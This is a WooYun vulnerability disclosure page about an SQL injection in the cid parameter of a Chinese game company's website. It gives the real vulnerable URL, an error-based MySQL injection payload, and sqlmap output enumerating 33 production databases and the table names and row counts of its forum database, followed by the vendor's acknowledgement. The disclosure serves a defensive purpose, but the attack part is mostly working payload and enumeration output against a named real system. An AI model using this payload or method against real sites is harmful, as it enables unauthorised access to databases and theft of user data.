当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166430

漏洞标题:英雄互娱SQL注入(33库涉及旗下几乎所有游戏数据库包含各种游戏激活码等)

相关厂商:英雄互娱

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-12-31 15:58

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-31: 细节已通知厂商并且等待厂商处理中
2016-01-04: 厂商已经确认,细节仅向厂商公开
2016-01-14: 细节向核心白帽子及相关领域专家公开
2016-01-24: 细节向普通白帽子公开
2016-02-03: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

233333333

详细说明:

http://ttx5.yingxiong.com/m/list.html?cid=*
参数cid 可注入

0.png


1.png


几乎囊括了旗下所有游戏 的数据库
BBS数据库

7.png


2.png


全名枪战

3.png


迷你刀塔:

4.png


5.png


club数据库:

6.png


8.png


其他的就不一一列举了

漏洞证明:

URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] n
sqlmap identified the following injection point(s) with a total of 2031 HTTP(s)
requests:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: http://ttx5.yingxiong.com:80/m/list.html?cid=-7296) OR 1 GROUP BY C
ONCAT(0x716b767171,(SELECT (CASE WHEN (6156=6156) THEN 1 ELSE 0 END)),0x7162706b
71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
[15:24:48] [INFO] testing MySQL
[15:24:49] [INFO] confirming MySQL
[15:24:49] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[15:24:49] [INFO] fetching database names
[15:24:49] [INFO] the SQL query used returns 33 entries
[15:24:49] [INFO] starting 10 threads
[15:24:50] [INFO] retrieved: information_schema
[15:24:50] [INFO] retrieved: cayx
[15:24:50] [INFO] retrieved: cayxcms
[15:24:50] [INFO] retrieved: dgl_zykj
[15:24:50] [INFO] retrieved: club
[15:24:50] [INFO] retrieved: gwlr
[15:24:50] [INFO] retrieved: game
[15:24:50] [INFO] retrieved: ccz
[15:24:50] [INFO] retrieved: gongfu
[15:24:50] [INFO] retrieved: ifsgcms
[15:24:50] [INFO] retrieved: js
[15:24:51] [INFO] retrieved: jntjcms
[15:24:51] [INFO] retrieved: mndt
[15:24:51] [INFO] retrieved: gd_zykj
[15:24:51] [INFO] retrieved: qjsn
[15:24:51] [INFO] retrieved: mysql
[15:24:51] [INFO] retrieved: bbs
[15:24:51] [INFO] retrieved: fnkjcms
[15:24:51] [INFO] retrieved: ttx5
[15:24:51] [INFO] retrieved: ttyxyx
[15:24:51] [INFO] retrieved: qtdlcms
[15:24:51] [INFO] retrieved: mxywk
[15:24:51] [INFO] retrieved: xsg
[15:24:52] [INFO] retrieved: process
[15:24:52] [INFO] retrieved: xmcms
[15:24:52] [INFO] retrieved: performance_schema
[15:24:52] [INFO] retrieved: sqbb
[15:24:52] [INFO] retrieved: yingxiong
[15:24:52] [INFO] retrieved: yxcms
[15:24:52] [INFO] retrieved: ttx5yx
[15:24:52] [INFO] retrieved: zycx
[15:24:52] [INFO] retrieved: we
[15:24:52] [INFO] retrieved: xsgcms
available databases [33]:
[*] bbs
[*] cayx
[*] cayxcms
[*] ccz
[*] club
[*] dgl_zykj
[*] fnkjcms
[*] game
[*] gd_zykj
[*] gongfu
[*] gwlr
[*] ifsgcms
[*] information_schema
[*] jntjcms
[*] js
[*] mndt
[*] mxywk
[*] mysql
[*] performance_schema
[*] process
[*] qjsn
[*] qtdlcms
[*] sqbb
[*] ttx5
[*] ttx5yx
[*] ttyxyx
[*] we
[*] xmcms
[*] xsg
[*] xsgcms
[*] yingxiong
[*] yxcms
[*] zycx
[15:24:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2074 times
[15:24:52] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:24:52


BBS数据库:

Database: bbs
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| pre_thread_ip_log                          | 881859  |
| pre_home_notification                      | 243062  |
| pre_forum_post                             | 205318  |
| pre_forum_threadpartake                    | 123896  |
| pre_forum_thread                           | 107231  |
| pre_home_pokearchive                       | 92029   |
| pre_ucenter_memberfields                   | 81304   |
| pre_ucenter_members                        | 81304   |
| pre_common_member_newprompt                | 78831   |
| pre_forum_thread_moderate                  | 71770   |
| pre_common_credit_rule_log                 | 69218   |
| pre_forum_threadlog                        | 67670   |
| pre_common_member_count_archive            | 63811   |
| pre_common_member_field_forum_archive      | 63811   |
| pre_common_member_field_home_archive       | 63811   |
| pre_common_member_profile_archive          | 63811   |
| pre_common_member_status_archive           | 63811   |
| pre_common_member_archive                  | 63803   |
| pre_common_district                        | 45051   |
| pre_forum_statlog                          | 42148   |
| pre_common_onlinetime                      | 26151   |
| pre_plugin_auction_message                 | 25162   |
| pre_forum_hotreply_member                  | 23994   |
| pre_forum_sofa                             | 20724   |
| pre_home_poke                              | 20387   |
| pre_common_credit_log_field                | 18673   |
| pre_common_credit_log                      | 18561   |
| pre_fx_checkin_log                         | 18459   |
| pre_forum_threadmod                        | 17677   |
| pre_common_member_status                   | 17499   |
| pre_common_member_count                    | 17498   |
| pre_common_member_field_forum              | 17498   |
| pre_common_member_field_home               | 17498   |
| pre_common_member_profile                  | 17498   |
| pre_common_member                          | 17496   |
| pre_common_connect_guest                   | 14393   |
| pre_fx_checkin                             | 13377   |
| pre_plugin_auctionapply                    | 12873   |
| pre_connect_memberbindlog                  | 9414    |
| pre_forum_newthread                        | 9139    |
| pre_common_member_connect                  | 9050    |
| pre_forum_attachment                       | 7939    |
| pre_forum_post_moderate                    | 6047    |
| pre_forum_modwork                          | 5881    |
| pre_mobile_wsq_threadlist                  | 5599    |
| pre_forum_pollvoter                        | 5283    |
| pre_forum_polloption                       | 4837    |
| pre_ucenter_pm_members                     | 4744    |
| pre_ucenter_pm_indexes                     | 4603    |
| pre_common_member_crime                    | 3997    |
| pre_forum_attachment_unused                | 2470    |
| pre_ucenter_pm_lists                       | 2412    |
| pre_forum_postlog                          | 2292    |
| pre_home_favorite                          | 2154    |
| pre_fx_checkin_rates                       | 2000    |
| pre_forum_poll                             | 1901    |
| pre_txz                                    | 1886    |
| pre_common_credit_rule_log_field           | 1883    |
| pre_common_word                            | 1755    |
| pre_forum_threadimage                      | 1635    |
| pre_home_friend                            | 1580    |
| pre_common_member_action_log               | 1325    |
| pre_forum_filter_post                      | 1261    |
| pre_home_friend_request                    | 1251    |
| pre_forum_logs                             | 907     |
| pre_security_evilpost                      | 894     |
| pre_ucenter_newpm                          | 833     |
| pre_common_block_pic                       | 830     |
| pre_common_stat                            | 806     |
| pre_home_friendlog                         | 794     |
| pre_forum_postcomment                      | 709     |
| pre_plugin_lj_sina                         | 667     |
| pre_forum_attachment_4                     | 642     |
| pre_forum_attachment_9                     | 635     |
| pre_forum_post_tableid                     | 634     |
| pre_forum_attachment_8                     | 568     |
| pre_forum_attachment_2                     | 540     |
| pre_forum_attachment_7                     | 528     |
| pre_forum_attachment_6                     | 523     |
| pre_forum_attachment_5                     | 519     |
| pre_ucenter_pm_messages_4                  | 513     |
| pre_forum_attachment_1                     | 512     |
| pre_common_stylevar                        | 499     |
| pre_forum_attachment_0                     | 498     |
| pre_forum_attachment_3                     | 490     |
| pre_ucenter_pm_messages_2                  | 488     |
| pre_ucenter_pm_messages_6                  | 484     |
| pre_ucenter_pm_messages_7                  | 479     |
| pre_ucenter_pm_messages_0                  | 467     |
| pre_forum_threadclass                      | 465     |
| pre_ucenter_pm_messages_5                  | 459     |
| pre_ucenter_pm_messages_9                  | 452     |
| pre_common_setting                         | 449     |
| pre_forum_rsscache                         | 441     |
| pre_ucenter_pm_messages_8                  | 430     |
| pre_ucenter_pm_messages_3                  | 416     |
| pre_ucenter_pm_messages_1                  | 406     |
| pre_security_eviluser                      | 401     |
| pre_forum_threaddisablepos                 | 332     |
| pre_forum_hotreply_number                  | 267     |
| pre_common_syscache                        | 262     |
| pre_common_smiley                          | 195     |
| pre_common_statuser                        | 162     |
| pre_common_block_item                      | 127     |
| pre_common_block_style                     | 104     |
| pre_common_session                         | 103     |
| pre_home_follow                            | 97      |
| pre_common_tag                             | 94      |
| pre_plugin_auction                         | 94      |
| pre_forum_postcache                        | 82      |
| pre_common_admincp_perm                    | 79      |
| pre_ucenter_badwords                       | 78      |
| pre_forum_forumfield                       | 72      |
| pre_forum_forum                            | 71      |
| pre_common_pluginvar                       | 68      |
| pre_common_cache                           | 61      |
| pre_common_member_grouppm                  | 53      |
| pre_common_member_profile_setting          | 51      |
| pre_common_nav                             | 51      |
| pre_forum_threadhot                        | 47      |
| pre_home_favorite_del                      | 47      |
| pre_forum_polloption_image                 | 46      |
| pre_forum_moderator                        | 45      |
| pre_forum_threadcalendar                   | 39      |
| pre_common_block                           | 38      |
| pre_common_credit_rule                     | 33      |
| pre_common_report                          | 29      |
| pre_common_regip                           | 28      |
| pre_forum_medallog                         | 28      |
| pre_ucenter_settings                       | 27      |
| pre_common_plugin                          | 24      |
| pre_forum_replycredit                      | 24      |
| pre_common_usergroup                       | 22      |
| pre_common_usergroup_field                 | 22      |
| pre_connect_postfeedlog                    | 22      |
| pre_connect_feedlog                        | 21      |
| pre_common_cron                            | 20      |
| pre_common_member_medal                    | 17      |
| pre_home_click                             | 15      |
| pre_forum_medal                            | 11      |
| pre_common_admincp_cmenu                   | 9       |
| pre_common_grouppm                         | 8       |
| pre_common_optimizer                       | 8       |
| pre_forum_warning                          | 8       |
| pre_common_admingroup                      | 7       |
| pre_common_process                         | 7       |
| pre_common_word_type                       | 6       |
| pre_forum_imagetype                        | 6       |
| pre_forum_onlinelist                       | 6       |
| pre_forum_typeoption                       | 6       |
| pre_common_admincp_group                   | 5       |
| pre_common_style                           | 5       |
| pre_common_template                        | 5       |
| pre_myrepeats                              | 5       |
| pre_forum_bbcode                           | 4       |
| pre_lev_sign                               | 4       |
| pre_lev_sign_user                          | 4       |
| pre_common_failedip                        | 3       |
| pre_forum_grouplevel                       | 3       |
| pre_forum_poststick                        | 3       |
| pre_forum_threadpreview                    | 3       |
| pre_home_follow_feed_archiver              | 3       |
| pre_common_advertisement_custom            | 2       |
| pre_common_diy_data                        | 2       |
| pre_common_plugin_cnzz_user                | 2       |
| pre_common_plugin_cnzztongji               | 2       |
| pre_common_template_block                  | 2       |
| pre_fx_checkin_con                         | 2       |
| pre_mobile_setting                         | 2       |
| pre_study_daily_attendance                 | 2       |
| pre_study_daily_attendance_continuous_sign | 2       |
| pre_ucenter_failedlogins                   | 2       |
| pre_common_admincp_session                 | 1       |
| pre_common_block_xml                       | 1       |
| pre_common_failedlogin                     | 1       |
| pre_common_mailqueue                       | 1       |
| pre_common_member_secwhite                 | 1       |
| pre_common_secquestion                     | 1       |
| pre_common_tagitem                         | 1       |
| pre_forum_spacecache                       | 1       |
| pre_forum_threadprofile                    | 1       |
| pre_forum_threadtype                       | 1       |
| pre_plugin_auction_xml                     | 1       |
| pre_security_failedlog                     | 1       |
| pre_ucenter_admins                         | 1       |
| pre_ucenter_applications                   | 1       |
| pre_ucenter_notelist                       | 1       |
+--------------------------------------------+---------+
[15:29:10] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 646 times
[15:29:10] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\ttx5.yingxiong.com'
[*] shutting down at 15:29:10


修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-01-04 17:38

厂商回复:

的确是我们的疏忽,相关人员已经被处理,非常感谢!

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-31 16:48 | mango ( 核心白帽子 | Rank:1868 漏洞数:275 | 出一份微不足道的"力")

    i 这个域名??